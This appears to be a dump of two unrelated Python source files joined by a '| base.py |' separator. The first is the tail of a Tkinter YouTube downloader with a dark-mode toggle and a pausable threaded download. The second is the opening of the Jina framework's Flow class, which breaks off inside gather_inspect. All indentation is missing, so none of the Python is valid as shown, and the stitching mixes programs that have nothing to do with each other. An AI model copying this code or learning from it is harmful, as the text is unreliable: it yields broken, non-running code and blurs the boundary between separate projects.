if btnState:
btn.config(image=offImg, bg="#CECCBE", activebackground="#CECCBE")
root.config(bg="#CECCBE")
txt.config(text="Dark Mode: OFF", bg="#CECCBE")
btnState = False
else:
btn.config(image=onImg, bg="#2B2B2B", activebackground="#2B2B2B")
root.config(bg="#2B2B2B")
txt.config(text="Dark Mode: ON", bg="#2B2B2B")
btnState = True
is_paused = is_cancelled = False
def download_media(url,filename,audioOnly=False):
if(url):
global is_paused, is_cancelled
download_button['state'] = 'disabled'
download_audio_button['state'] = 'disabled'
pause_button['state'] = 'normal'
cancel_button['state'] = 'normal'
try:
progress['text'] = 'Connecting ...'
yt = YouTube(url)
if(audioOnly):
stream = yt.streams.filter(subtype='mp4',only_audio=True).first()
else:
stream = yt.streams.filter(subtype='mp4').first()
filesize = stream.filesize
with open(filename, 'wb') as f:
is_paused = is_cancelled = False
stream = request.stream(stream.url)
downloaded = 0
while True:
if is_cancelled:
progress['text'] = 'Download cancelled'
break
if is_paused:
continue
chunk = next(stream, None)
if chunk:
f.write(chunk)
downloaded += len(chunk)
progress['text'] = f'Downloaded {downloaded} / {filesize}'
else:
# no more data
progress['text'] = 'Download completed'
break
print('done')
except Exception as e:
print(e)
download_button['state'] = 'normal'
download_audio_button['state'] = 'normal'
pause_button['state'] = 'disabled'
cancel_button['state'] = 'disabled'
def start_download():
filename = askdirectory()
filename = filename+'/sample.mp4'
threading.Thread(target=download_media, args=(url_entry.get(),filename), daemon=True).start()
def start_audio_download():
filename = askdirectory()
filename = filename+'/sample.mp3'
threading.Thread(target=download_media, args=(url_entry.get(),filename,True), daemon=True).start()
def toggle_download():
global is_paused
is_paused = not is_paused
pause_button['text'] = 'Resume' if is_paused else 'Pause'
def cancel_download():
global is_cancelled
is_cancelled = True
# gui
root = Tk()
root.title("Youtube Downloader")
root.iconbitmap("main img/icon.ico")
root.geometry("500x650")
# switch toggle:
btnState = False
# switch images:
onImg = PhotoImage(file="dark img/switch-on.png")
offImg = PhotoImage(file="dark img/switch-off.png")
# Copyright
originalBtn = Button(root, text="Made by Swapnil", font="Rockwell", relief="flat")
originalBtn.pack(side=BOTTOM)
# Night Mode:
txt = Label(root, text="Dark Mode: OFF", font="FixedSys 17", bg="#CECCBE", fg="green")
txt.pack(side='bottom')
# switch widget:
btn = Button(root, text="OFF", borderwidth=0, command=darkmode, bg="#CECCBE", activebackground="#CECCBE", pady=1)
btn.pack(side=BOTTOM, padx=10, pady=10)
btn.config(image=offImg)
# main icon section
file = PhotoImage(file="main img/youtube.png")
headingIcon = Label(root, image=file)
headingIcon.pack(side=TOP, pady=3)
# Url Field
url_entry = Entry(root, justify=CENTER, bd=5, fg='green')
url_entry.pack(side=TOP, fill=X, padx=10)
url_entry.focus()
# Download Button
download_button = Button(root, text='Download', width=10, command=start_download, font='verdana', relief='ridge', bd=5, bg='#f5f5f5', fg='black')
download_button.pack(side=TOP, pady=10)
# Download Audio Button
download_audio_button = Button(root, text='Download Audio', width=14, command=start_audio_download, font='verdana', relief='ridge', bd=5, bg='#f5f5f5', fg='black')
download_audio_button.pack(side=TOP, pady=10)
# Progress
progress = Label(root)
progress.pack(side=TOP)
# Pause Button
pause_button = Button(root, text='Pause', width=10, command=toggle_download, state='disabled', font='verdana', relief='ridge', bd=5, bg='#f5f5f5', fg='black')
pause_button.pack(side=TOP, pady=10)
# Cancel Button
cancel_button = Button(root, text='Cancel', width=10, command=cancel_download, state='disabled', font='verdana', relief='ridge', bd=5, bg='#f5f5f5', fg='black')
cancel_button.pack(side=TOP, pady=10)
root.mainloop()
|
base.py
|
import argparse
import base64
import copy
import itertools
import json
import multiprocessing
import os
import re
import sys
import threading
import time
import uuid
from collections import OrderedDict
from contextlib import ExitStack
from typing import (
Optional,
Union,
Tuple,
List,
Set,
Dict,
overload,
Type,
TYPE_CHECKING,
)
from jina.orchestrate.flow.builder import allowed_levels, _hanging_pods
from jina import __default_host__, helper
from jina.clients import Client
from jina.clients.mixin import AsyncPostMixin, PostMixin
from jina.enums import (
FlowBuildLevel,
PodRoleType,
FlowInspectType,
GatewayProtocolType,
)
from jina.excepts import FlowTopologyError, FlowMissingPodError, RuntimeFailToStart
from jina.helper import (
colored,
get_public_ip,
get_internal_ip,
typename,
ArgNamespace,
download_mermaid_url,
CatchAllCleanupContextManager,
)
from jina.jaml import JAMLCompatible
from jina.logging.logger import JinaLogger
from jina.parsers import set_gateway_parser, set_pod_parser, set_client_cli_parser
from jina.parsers.flow import set_flow_parser
from jina.orchestrate.pods import Pod
__all__ = ['Flow']
class FlowType(type(ExitStack), type(JAMLCompatible)):
"""Type of Flow, metaclass of :class:`BaseFlow`"""
pass
_regex_port = r'(.*?):([0-9]{1,4}|[1-5][0-9]{4}|6[0-4][0-9]{3}|65[0-4][0-9]{2}|655[0-2][0-9]|6553[0-5])$'
if TYPE_CHECKING:
from jina.serve.executors import BaseExecutor
from jina.clients.base import BaseClient
from jina.orchestrate.flow.asyncio import AsyncFlow
GATEWAY_NAME = 'gateway'
FALLBACK_PARSERS = [
set_gateway_parser(),
set_pod_parser(),
set_client_cli_parser(),
set_flow_parser(),
]
class Flow(PostMixin, JAMLCompatible, ExitStack, metaclass=FlowType):
"""Flow is how Jina streamlines and distributes Executors. """
# overload_inject_start_client_flow
@overload
def __init__(
self,
*,
asyncio: Optional[bool] = False,
host: Optional[str] = '0.0.0.0',
https: Optional[bool] = False,
port: Optional[int] = None,
protocol: Optional[str] = 'GRPC',
proxy: Optional[bool] = False,
results_as_docarray: Optional[bool] = False,
**kwargs,
):
"""Create a Flow. Flow is how Jina streamlines and scales Executors. This overloaded method provides arguments from `jina client` CLI.
:param asyncio: If set, then the input and output of this Client work in an asynchronous manner.
:param host: The host address of the runtime, by default it is 0.0.0.0.
:param https: If set, connect to gateway using https
:param port: The port of the Gateway, which the client should connect to.
:param protocol: Communication protocol between server and client.
:param proxy: If set, respect the http_proxy and https_proxy environment variables. otherwise, it will unset these proxy variables before start. gRPC seems to prefer no proxy
:param results_as_docarray: If set, return results as DocArray instead of Request.
.. # noqa: DAR202
.. # noqa: DAR101
.. # noqa: DAR003
"""
# overload_inject_end_client_flow
# overload_inject_start_gateway_flow
@overload
def __init__(
self,
*,
compress: Optional[str] = 'NONE',
compress_min_bytes: Optional[int] = 1024,
compress_min_ratio: Optional[float] = 1.1,
connection_list: Optional[str] = None,
cors: Optional[bool] = False,
daemon: Optional[bool] = False,
default_swagger_ui: Optional[bool] = False,
description: Optional[str] = None,
env: Optional[dict] = None,
expose_endpoints: Optional[str] = None,
expose_public: Optional[bool] = False,
graph_description: Optional[str] = '{}',
host: Optional[str] = '0.0.0.0',
host_in: Optional[str] = '0.0.0.0',
log_config: Optional[str] = None,
name: Optional[str] = 'gateway',
native: Optional[bool] = False,
no_crud_endpoints: Optional[bool] = False,
no_debug_endpoints: Optional[bool] = False,
pods_addresses: Optional[str] = '{}',
polling: Optional[str] = 'ANY',
port_expose: Optional[int] = None,
port_in: Optional[int] = None,
prefetch: Optional[int] = 0,
protocol: Optional[str] = 'GRPC',
proxy: Optional[bool] = False,
py_modules: Optional[List[str]] = None,
quiet: Optional[bool] = False,
quiet_error: Optional[bool] = False,
replicas: Optional[int] = 1,
runtime_backend: Optional[str] = 'PROCESS',
runtime_cls: Optional[str] = 'GRPCGatewayRuntime',
shards: Optional[int] = 1,
timeout_ctrl: Optional[int] = 60,
timeout_ready: Optional[int] = 600000,
title: Optional[str] = None,
uses: Optional[Union[str, Type['BaseExecutor'], dict]] = 'BaseExecutor',
uses_after_address: Optional[str] = None,
uses_before_address: Optional[str] = None,
uses_metas: Optional[dict] = None,
uses_requests: Optional[dict] = None,
uses_with: Optional[dict] = None,
uvicorn_kwargs: Optional[dict] = None,
workspace: Optional[str] = None,
**kwargs,
):
"""Create a Flow. Flow is how Jina streamlines and scales Executors. This overloaded method provides arguments from `jina gateway` CLI.
:param compress: The compress algorithm used over the entire Flow.
Note that this is not necessarily effective,
it depends on the settings of `--compress-min-bytes` and `compress-min-ratio`
:param compress_min_bytes: The original message size must be larger than this number to trigger the compress algorithm, -1 means disable compression.
:param compress_min_ratio: The compression ratio (uncompressed_size/compressed_size) must be higher than this number to trigger the compress algorithm.
:param connection_list: dictionary JSON with a list of connections to configure
:param cors: If set, a CORS middleware is added to FastAPI frontend to allow cross-origin access.
:param daemon: The Pea attempts to terminate all of its Runtime child processes/threads on existing. setting it to true basically tell the Pea do not wait on the Runtime when closing
:param default_swagger_ui: If set, the default swagger ui is used for `/docs` endpoint.
:param description: The description of this HTTP server. It will be used in automatics docs such as Swagger UI.
:param env: The map of environment variables that are available inside runtime
:param expose_endpoints: A JSON string that represents a map from executor endpoints (`@requests(on=...)`) to HTTP endpoints.
:param expose_public: If set, expose the public IP address to remote when necessary, by default it exposesprivate IP address, which only allows accessing under the same network/subnet. Important to set this to true when the Pea will receive input connections from remote Peas
:param graph_description: Routing graph for the gateway
:param host: The host address of the runtime, by default it is 0.0.0.0.
:param host_in: The host address for binding to, by default it is 0.0.0.0
:param log_config: The YAML config of the logger used in this object.
:param name: The name of this object.
This will be used in the following places:
- how you refer to this object in Python/YAML/CLI
- visualization
- log message header
- ...
When not given, then the default naming strategy will apply.
:param native: If set, only native Executors is allowed, and the Executor is always run inside WorkerRuntime.
:param no_crud_endpoints: If set, /index, /search, /update, /delete endpoints are removed from HTTP interface.
Any executor that has `@requests(on=...)` bind with those values will receive data requests.
:param no_debug_endpoints: If set, /status /post endpoints are removed from HTTP interface.
:param pods_addresses: dictionary JSON with the input addresses of each Pod
:param polling: The polling strategy of the Pod and its endpoints (when `shards>1`).
Can be defined for all endpoints of a Pod or by endpoint.
Define per Pod:
- ANY: only one (whoever is idle) Pea polls the message
- ALL: all Peas poll the message (like a broadcast)
Define per Endpoint:
JSON dict, {endpoint: PollingType}
{'/custom': 'ALL', '/search': 'ANY', '*': 'ANY'}
:param port_expose: The port that the gateway exposes for clients for GRPC connections.
:param port_in: The port for input data to bind to, default a random port between [49152, 65535]
:param prefetch: Number of requests fetched from the client before feeding into the first Executor.
Used to control the speed of data input into a Flow. 0 disables prefetch (disabled by default)
:param protocol: Communication protocol between server and client.
:param proxy: If set, respect the http_proxy and https_proxy environment variables. otherwise, it will unset these proxy variables before start. gRPC seems to prefer no proxy
:param py_modules: The customized python modules need to be imported before loading the executor
Note that the recommended way is to only import a single module - a simple python file, if your
executor can be defined in a single file, or an ``__init__.py`` file if you have multiple files,
which should be structured as a python package. For more details, please see the
`Executor cookbook <https://docs.jina.ai/fundamentals/executor/repository-structure/>`__
:param quiet: If set, then no log will be emitted from this object.
:param quiet_error: If set, then exception stack information will not be added to the log
:param replicas: The number of replicas in the pod
:param runtime_backend: The parallel backend of the runtime inside the Pea
:param runtime_cls: The runtime class to run inside the Pea
:param shards: The number of shards in the pod running at the same time. For more details check https://docs.jina.ai/fundamentals/flow/topology/
:param timeout_ctrl: The timeout in milliseconds of the control request, -1 for waiting forever
:param timeout_ready: The timeout in milliseconds of a Pea waits for the runtime to be ready, -1 for waiting forever
:param title: The title of this HTTP server. It will be used in automatics docs such as Swagger UI.
:param uses: The config of the executor, it could be one of the followings:
* an Executor YAML file (.yml, .yaml, .jaml)
* a Jina Hub Executor (must start with `jinahub://` or `jinahub+docker://`)
* a docker image (must start with `docker://`)
* the string literal of a YAML config (must start with `!` or `jtype: `)
* the string literal of a JSON config
When use it under Python, one can use the following values additionally:
- a Python dict that represents the config
- a text file stream has `.read()` interface
:param uses_after_address: The address of the uses-before runtime
:param uses_before_address: The address of the uses-before runtime
:param uses_metas: Dictionary of keyword arguments that will override the `metas` configuration in `uses`
:param uses_requests: Dictionary of keyword arguments that will override the `requests` configuration in `uses`
:param uses_with: Dictionary of keyword arguments that will override the `with` configuration in `uses`
:param uvicorn_kwargs: Dictionary of kwargs arguments that will be passed to Uvicorn server when starting the server
More details can be found in Uvicorn docs: https://www.uvicorn.org/settings/
:param workspace: The working directory for any IO operations in this object. If not set, then derive from its parent `workspace`.
.. # noqa: DAR202
.. # noqa: DAR101
.. # noqa: DAR003
"""
# overload_inject_end_gateway_flow
# overload_inject_start_flow
@overload
def __init__(
self,
*,
env: Optional[dict] = None,
inspect: Optional[str] = 'COLLECT',
log_config: Optional[str] = None,
name: Optional[str] = None,
polling: Optional[str] = 'ANY',
quiet: Optional[bool] = False,
quiet_error: Optional[bool] = False,
timeout_ctrl: Optional[int] = 60,
uses: Optional[str] = None,
workspace: Optional[str] = './',
**kwargs,
):
"""Create a Flow. Flow is how Jina streamlines and scales Executors. This overloaded method provides arguments from `jina flow` CLI.
:param env: The map of environment variables that are available inside runtime
:param inspect: The strategy on those inspect pods in the flow.
If `REMOVE` is given then all inspect pods are removed when building the flow.
:param log_config: The YAML config of the logger used in this object.
:param name: The name of this object.
This will be used in the following places:
- how you refer to this object in Python/YAML/CLI
- visualization
- log message header
- ...
When not given, then the default naming strategy will apply.
:param polling: The polling strategy of the Pod and its endpoints (when `shards>1`).
Can be defined for all endpoints of a Pod or by endpoint.
Define per Pod:
- ANY: only one (whoever is idle) Pea polls the message
- ALL: all Peas poll the message (like a broadcast)
Define per Endpoint:
JSON dict, {endpoint: PollingType}
{'/custom': 'ALL', '/search': 'ANY', '*': 'ANY'}
:param quiet: If set, then no log will be emitted from this object.
:param quiet_error: If set, then exception stack information will not be added to the log
:param timeout_ctrl: The timeout in milliseconds of the control request, -1 for waiting forever
:param uses: The YAML file represents a flow
:param workspace: The working directory for any IO operations in this object. If not set, then derive from its parent `workspace`.
.. # noqa: DAR202
.. # noqa: DAR101
.. # noqa: DAR003
"""
# overload_inject_end_flow
def __init__(
self,
args: Optional['argparse.Namespace'] = None,
**kwargs,
):
super().__init__()
self._version = '1' #: YAML version number, this will be later overridden if YAML config says the other way
self._pod_nodes = OrderedDict() # type: Dict[str, Pod]
self._inspect_pods = {} # type: Dict[str, str]
self._endpoints_mapping = {} # type: Dict[str, Dict]
self._build_level = FlowBuildLevel.EMPTY
self._last_changed_pod = [
GATEWAY_NAME
] #: default first pod is gateway, will add when build()
self._update_args(args, **kwargs)
if isinstance(self.args, argparse.Namespace):
self.logger = JinaLogger(
self.__class__.__name__, **vars(self.args), **self._common_kwargs
)
else:
self.logger = JinaLogger(self.__class__.__name__, **self._common_kwargs)
def _update_args(self, args, **kwargs):
from jina.parsers.flow import set_flow_parser
from jina.helper import ArgNamespace
_flow_parser = set_flow_parser()
if args is None:
args = ArgNamespace.kwargs2namespace(
kwargs, _flow_parser, True, fallback_parsers=FALLBACK_PARSERS
)
self.args = args
# common args should be the ones that can not be parsed by _flow_parser
known_keys = vars(args)
self._common_kwargs = {k: v for k, v in kwargs.items() if k not in known_keys}
self._kwargs = ArgNamespace.get_non_defaults_args(
args, _flow_parser
) #: for yaml dump
if self._common_kwargs.get('asyncio', False) and not isinstance(
self, AsyncPostMixin
):
from jina.orchestrate.flow.asyncio import AsyncFlow
self.__class__ = AsyncFlow
@staticmethod
def _parse_endpoints(op_flow, pod_name, endpoint, connect_to_last_pod=False) -> Set:
# parsing needs
if isinstance(endpoint, str):
endpoint = [endpoint]
elif not endpoint:
if op_flow._last_changed_pod and connect_to_last_pod:
endpoint = [op_flow.last_pod]
else:
endpoint = []
if isinstance(endpoint, (list, tuple)):
for idx, s in enumerate(endpoint):
if s == pod_name:
raise FlowTopologyError(
'the income/output of a pod can not be itself'
)
else:
raise ValueError(f'endpoint={endpoint} is not parsable')
# if an endpoint is being inspected, then replace it with inspected Pod
endpoint = set(op_flow._inspect_pods.get(ep, ep) for ep in endpoint)
return endpoint
@property
def last_pod(self):
"""Last pod
.. # noqa: DAR401
.. # noqa: DAR201
"""
return self._last_changed_pod[-1]
@last_pod.setter
def last_pod(self, name: str):
"""
Set a Pod as the last Pod in the Flow, useful when modifying the Flow.
.. # noqa: DAR401
:param name: the name of the existing Pod
"""
if name not in self._pod_nodes:
raise FlowMissingPodError(f'{name} can not be found in this Flow')
if self._last_changed_pod and name == self.last_pod:
pass
else:
self._last_changed_pod.append(name)
# graph is now changed so we need to
# reset the build level to the lowest
self._build_level = FlowBuildLevel.EMPTY
@allowed_levels([FlowBuildLevel.EMPTY])
def _add_gateway(
self,
needs: str,
graph_description: Dict[str, List[str]],
pod_addresses: Dict[str, List[str]],
**kwargs,
):
kwargs.update(
dict(
name=GATEWAY_NAME,
ctrl_with_ipc=True, # otherwise ctrl port would be conflicted
host=self.host,
protocol=self.protocol,
port_expose=self.port_expose,
pod_role=PodRoleType.GATEWAY,
expose_endpoints=json.dumps(self._endpoints_mapping),
)
)
kwargs.update(self._common_kwargs)
args = ArgNamespace.kwargs2namespace(kwargs, set_gateway_parser())
args.noblock_on_start = True
args.graph_description = json.dumps(graph_description)
args.pods_addresses = json.dumps(pod_addresses)
self._pod_nodes[GATEWAY_NAME] = Pod(args, needs)
def _get_pod_addresses(self) -> Dict[str, List[str]]:
graph_dict = {}
for node, v in self._pod_nodes.items():
if node == 'gateway':
continue
graph_dict[node] = [f'{v.protocol}://{v.host}:{v.head_port_in}']
return graph_dict
def _get_k8s_pod_addresses(self, k8s_namespace: str) -> Dict[str, List[str]]:
graph_dict = {}
from jina.serve.networking import K8sGrpcConnectionPool
from jina.orchestrate.pods.config.helper import to_compatible_name
for node, v in self._pod_nodes.items():
if node == 'gateway':
continue
pod_k8s_address = (
f'{to_compatible_name(v.head_args.name)}.{k8s_namespace}.svc'
)
graph_dict[node] = [
f'{pod_k8s_address}:{K8sGrpcConnectionPool.K8S_PORT_IN}'
]
return graph_dict
def _get_docker_compose_pod_addresses(self) -> Dict[str, List[str]]:
graph_dict = {}
from jina.orchestrate.pods.config.docker_compose import PORT_IN
from jina.orchestrate.pods.config.helper import to_compatible_name
for node, v in self._pod_nodes.items():
if node == 'gateway':
continue
pod_docker_compose_address = (
f'{to_compatible_name(v.head_args.name)}:{PORT_IN}'
)
graph_dict[node] = [pod_docker_compose_address]
return graph_dict
def _get_graph_representation(self) -> Dict[str, List[str]]:
def _add_node(graph, n):
# in the graph we need to distinguish between start and end gateway, although they are the same pod
if n == 'gateway':
n = 'start-gateway'
if n not in graph:
graph[n] = []
return n
graph_dict = {}
for node, v in self._pod_nodes.items():
node = _add_node(graph_dict, node)
if node == 'start-gateway':
continue
for need in sorted(v.needs):
need = _add_node(graph_dict, need)
graph_dict[need].append(node)
# find all non hanging leafs
last_pod = self.last_pod
if last_pod != 'gateway':
graph_dict[last_pod].append('end-gateway')
return graph_dict
@allowed_levels([FlowBuildLevel.EMPTY])
def needs(
self, needs: Union[Tuple[str], List[str]], name: str = 'joiner', *args, **kwargs
) -> 'Flow':
"""
Add a blocker to the Flow, wait until all peas defined in **needs** completed.
.. # noqa: DAR401
:param needs: list of service names to wait
:param name: the name of this joiner, by default is ``joiner``
:param args: additional positional arguments forwarded to the add function
:param kwargs: additional key value arguments forwarded to the add function
:return: the modified Flow
"""
if len(needs) <= 1:
raise FlowTopologyError(
'no need to wait for a single service, need len(needs) > 1'
)
return self.add(
name=name, needs=needs, pod_role=PodRoleType.JOIN, *args, **kwargs
)
def needs_all(self, name: str = 'joiner', *args, **kwargs) -> 'Flow':
"""
Collect all hanging Pods so far and add a blocker to the Flow; wait until all handing peas completed.
:param name: the name of this joiner (default is ``joiner``)
:param args: additional positional arguments which are forwarded to the add and needs function
:param kwargs: additional key value arguments which are forwarded to the add and needs function
:return: the modified Flow
"""
needs = _hanging_pods(self)
if len(needs) == 1:
return self.add(name=name, needs=needs, *args, **kwargs)
return self.needs(name=name, needs=needs, *args, **kwargs)
# overload_inject_start_pod
@overload
def add(
self,
*,
connection_list: Optional[str] = None,
daemon: Optional[bool] = False,
docker_kwargs: Optional[dict] = None,
entrypoint: Optional[str] = None,
env: Optional[dict] = None,
expose_public: Optional[bool] = False,
external: Optional[bool] = False,
force_update: Optional[bool] = False,
gpus: Optional[str] = None,
host: Optional[str] = '0.0.0.0',
host_in: Optional[str] = '0.0.0.0',
install_requirements: Optional[bool] = False,
log_config: Optional[str] = None,
name: Optional[str] = None,
native: Optional[bool] = False,
polling: Optional[str] = 'ANY',
port_in: Optional[int] = None,
port_jinad: Optional[int] = 8000,
pull_latest: Optional[bool] = False,
py_modules: Optional[List[str]] = None,
quiet: Optional[bool] = False,
quiet_error: Optional[bool] = False,
quiet_remote_logs: Optional[bool] = False,
replicas: Optional[int] = 1,
runtime_backend: Optional[str] = 'PROCESS',
runtime_cls: Optional[str] = 'WorkerRuntime',
shards: Optional[int] = 1,
timeout_ctrl: Optional[int] = 60,
timeout_ready: Optional[int] = 600000,
upload_files: Optional[List[str]] = None,
uses: Optional[Union[str, Type['BaseExecutor'], dict]] = 'BaseExecutor',
uses_after: Optional[Union[str, Type['BaseExecutor'], dict]] = None,
uses_after_address: Optional[str] = None,
uses_before: Optional[Union[str, Type['BaseExecutor'], dict]] = None,
uses_before_address: Optional[str] = None,
uses_metas: Optional[dict] = None,
uses_requests: Optional[dict] = None,
uses_with: Optional[dict] = None,
volumes: Optional[List[str]] = None,
workspace: Optional[str] = None,
**kwargs,
) -> Union['Flow', 'AsyncFlow']:
"""Add an Executor to the current Flow object.
:param connection_list: dictionary JSON with a list of connections to configure
:param daemon: The Pea attempts to terminate all of its Runtime child processes/threads on existing. setting it to true basically tell the Pea do not wait on the Runtime when closing
:param docker_kwargs: Dictionary of kwargs arguments that will be passed to Docker SDK when starting the docker '
container.
More details can be found in the Docker SDK docs: https://docker-py.readthedocs.io/en/stable/
:param entrypoint: The entrypoint command overrides the ENTRYPOINT in Docker image. when not set then the Docker image ENTRYPOINT takes effective.
:param env: The map of environment variables that are available inside runtime
:param expose_public: If set, expose the public IP address to remote when necessary, by default it exposesprivate IP address, which only allows accessing under the same network/subnet. Important to set this to true when the Pea will receive input connections from remote Peas
:param external: The Pod will be considered an external Pod that has been started independently from the Flow.This Pod will not be context managed by the Flow.
:param force_update: If set, always pull the latest Hub Executor bundle even it exists on local
:param gpus: This argument allows dockerized Jina executor discover local gpu devices.
Note,
- To access all gpus, use `--gpus all`.
- To access multiple gpus, e.g. make use of 2 gpus, use `--gpus 2`.
- To access specified gpus based on device id, use `--gpus device=[YOUR-GPU-DEVICE-ID]`
- To access specified gpus based on multiple device id, use `--gpus device=[YOUR-GPU-DEVICE-ID1],device=[YOUR-GPU-DEVICE-ID2]`
- To specify more parameters, use `--gpus device=[YOUR-GPU-DEVICE-ID],runtime=nvidia,capabilities=display
:param host: The host address of the runtime, by default it is 0.0.0.0.
:param host_in: The host address for binding to, by default it is 0.0.0.0
:param install_requirements: If set, install `requirements.txt` in the Hub Executor bundle to local
:param log_config: The YAML config of the logger used in this object.
:param name: The name of this object.
This will be used in the following places:
- how you refer to this object in Python/YAML/CLI
- visualization
- log message header
- ...
When not given, then the default naming strategy will apply.
:param native: If set, only native Executors is allowed, and the Executor is always run inside WorkerRuntime.
:param polling: The polling strategy of the Pod and its endpoints (when `shards>1`).
Can be defined for all endpoints of a Pod or by endpoint.
Define per Pod:
- ANY: only one (whoever is idle) Pea polls the message
- ALL: all Peas poll the message (like a broadcast)
Define per Endpoint:
JSON dict, {endpoint: PollingType}
{'/custom': 'ALL', '/search': 'ANY', '*': 'ANY'}
:param port_in: The port for input data to bind to, default a random port between [49152, 65535]
:param port_jinad: The port of the remote machine for usage with JinaD.
:param pull_latest: Pull the latest image before running
:param py_modules: The customized python modules need to be imported before loading the executor
Note that the recommended way is to only import a single module - a simple python file, if your
executor can be defined in a single file, or an ``__init__.py`` file if you have multiple files,
which should be structured as a python package. For more details, please see the
`Executor cookbook <https://docs.jina.ai/fundamentals/executor/repository-structure/>`__
:param quiet: If set, then no log will be emitted from this object.
:param quiet_error: If set, then exception stack information will not be added to the log
:param quiet_remote_logs: Do not display the streaming of remote logs on local console
:param replicas: The number of replicas in the pod
:param runtime_backend: The parallel backend of the runtime inside the Pea
:param runtime_cls: The runtime class to run inside the Pea
:param shards: The number of shards in the pod running at the same time. For more details check https://docs.jina.ai/fundamentals/flow/topology/
:param timeout_ctrl: The timeout in milliseconds of the control request, -1 for waiting forever
:param timeout_ready: The timeout in milliseconds of a Pea waits for the runtime to be ready, -1 for waiting forever
:param upload_files: The files on the host to be uploaded to the remote
workspace. This can be useful when your Pod has more
file dependencies beyond a single YAML file, e.g.
Python files, data files.
Note,
- currently only flatten structure is supported, which means if you upload `[./foo/a.py, ./foo/b.pp, ./bar/c.yml]`, then they will be put under the _same_ workspace on the remote, losing all hierarchies.
- by default, `--uses` YAML file is always uploaded.
- uploaded files are by default isolated across the runs. To ensure files are submitted to the same workspace across different runs, use `--workspace-id` to specify the workspace.
:param uses: The config of the executor, it could be one of the followings:
* an Executor YAML file (.yml, .yaml, .jaml)
* a Jina Hub Executor (must start with `jinahub://` or `jinahub+docker://`)
* a docker image (must start with `docker://`)
* the string literal of a YAML config (must start with `!` or `jtype: `)
* the string literal of a JSON config
When use it under Python, one can use the following values additionally:
- a Python dict that represents the config
- a text file stream has `.read()` interface
:param uses_after: The executor attached after the Peas described by --uses, typically used for receiving from all shards, accepted type follows `--uses`
:param uses_after_address: The address of the uses-before runtime
:param uses_before: The executor attached after the Peas described by --uses, typically before sending to all shards, accepted type follows `--uses`
:param uses_before_address: The address of the uses-before runtime
:param uses_metas: Dictionary of keyword arguments that will override the `metas` configuration in `uses`
:param uses_requests: Dictionary of keyword arguments that will override the `requests` configuration in `uses`
:param uses_with: Dictionary of keyword arguments that will override the `with` configuration in `uses`
:param volumes: The path on the host to be mounted inside the container.
Note,
- If separated by `:`, then the first part will be considered as the local host path and the second part is the path in the container system.
- If no split provided, then the basename of that directory will be mounted into container's root path, e.g. `--volumes="/user/test/my-workspace"` will be mounted into `/my-workspace` inside the container.
- All volumes are mounted with read-write mode.
:param workspace: The working directory for any IO operations in this object. If not set, then derive from its parent `workspace`.
:return: a (new) Flow object with modification
.. # noqa: DAR202
.. # noqa: DAR101
.. # noqa: DAR003
"""
# overload_inject_end_pod
@allowed_levels([FlowBuildLevel.EMPTY])
def add(
self,
*,
needs: Optional[Union[str, Tuple[str], List[str]]] = None,
copy_flow: bool = True,
pod_role: 'PodRoleType' = PodRoleType.POD,
**kwargs,
) -> 'Flow':
"""
Add a Pod to the current Flow object and return the new modified Flow object.
The attribute of the Pod can be later changed with :py:meth:`set` or deleted with :py:meth:`remove`
.. # noqa: DAR401
:param needs: the name of the Pod(s) that this Pod receives data from.
One can also use 'gateway' to indicate the connection with the gateway.
:param pod_role: the role of the Pod, used for visualization and route planning
:param copy_flow: when set to true, then always copy the current Flow and do the modification on top of it then return, otherwise, do in-line modification
:param kwargs: other keyword-value arguments that the Pod CLI supports
:return: a (new) Flow object with modification
"""
op_flow = copy.deepcopy(self) if copy_flow else self
# pod naming logic
pod_name = kwargs.get('name', None)
if pod_name in op_flow._pod_nodes:
new_name = f'{pod_name}{len(op_flow._pod_nodes)}'
self.logger.debug(
f'"{pod_name}" is used in this Flow already! renamed it to "{new_name}"'
)
pod_name = new_name
if not pod_name:
pod_name = f'executor{len(op_flow._pod_nodes)}'
if not pod_name.isidentifier():
# hyphen - can not be used in the name
raise ValueError(
f'name: {pod_name} is invalid, please follow the python variable name conventions'
)
# needs logic
needs = op_flow._parse_endpoints(
op_flow, pod_name, needs, connect_to_last_pod=True
)
# set the kwargs inherit from `Flow(kwargs1=..., kwargs2=)`
for key, value in op_flow._common_kwargs.items():
if key not in kwargs:
kwargs[key] = value
# check if host is set to remote:port
if 'host' in kwargs:
m = re.match(_regex_port, kwargs['host'])
if (
kwargs.get('host', __default_host__) != __default_host__
and m
and 'port_jinad' not in kwargs
):
kwargs['port_jinad'] = m.group(2)
kwargs['host'] = m.group(1)
# update kwargs of this Pod
kwargs.update(dict(name=pod_name, pod_role=pod_role, num_part=len(needs)))
parser = set_pod_parser()
if pod_role == PodRoleType.GATEWAY:
parser = set_gateway_parser()
args = ArgNamespace.kwargs2namespace(
kwargs, parser, True, fallback_parsers=FALLBACK_PARSERS
)
# pod workspace if not set then derive from flow workspace
args.workspace = os.path.abspath(args.workspace or self.workspace)
args.noblock_on_start = True
args.extra_search_paths = self.args.extra_search_paths
port_in = kwargs.get('port_in', None)
if not port_in:
port_in = helper.random_port()
args.port_in = port_in
op_flow._pod_nodes[pod_name] = Pod(args, needs)
op_flow.last_pod = pod_name
return op_flow
@allowed_levels([FlowBuildLevel.EMPTY])
def inspect(self, name: str = 'inspect', *args, **kwargs) -> 'Flow':
"""Add an inspection on the last changed Pod in the Flow
Internally, it adds two Pods to the Flow. But don't worry, the overhead is minimized and you
can remove them by simply using `Flow(inspect=FlowInspectType.REMOVE)` before using the Flow.
.. highlight:: bash
.. code-block:: bash
Flow -- PUB-SUB -- BasePod(_pass) -- Flow
|
-- PUB-SUB -- InspectPod (Hanging)
In this way, :class:`InspectPod` looks like a simple ``_pass`` from outside and
does not introduce side-effects (e.g. changing the socket type) to the original Flow.
The original incoming and outgoing socket types are preserved.
This function is very handy for introducing an Evaluator into the Flow.
.. seealso::
:meth:`gather_inspect`
:param name: name of the Pod
:param args: args for .add()
:param kwargs: kwargs for .add()
:return: the new instance of the Flow
"""
_last_pod = self.last_pod
op_flow = self.add(
name=name, needs=_last_pod, pod_role=PodRoleType.INSPECT, *args, **kwargs
)
# now remove uses and add an auxiliary Pod
if 'uses' in kwargs:
kwargs.pop('uses')
op_flow = op_flow.add(
name=f'_aux_{name}',
needs=_last_pod,
pod_role=PodRoleType.INSPECT_AUX_PASS,
*args,
**kwargs,
)
# register any future connection to _last_pod by the auxiliary Pod
op_flow._inspect_pods[_last_pod] = op_flow.last_pod
return op_flow
@allowed_levels([FlowBuildLevel.EMPTY])
def gather_inspect(
self,
name: str = 'gather_inspect',
include_last_pod: bool = True,
*args,
**kwargs,
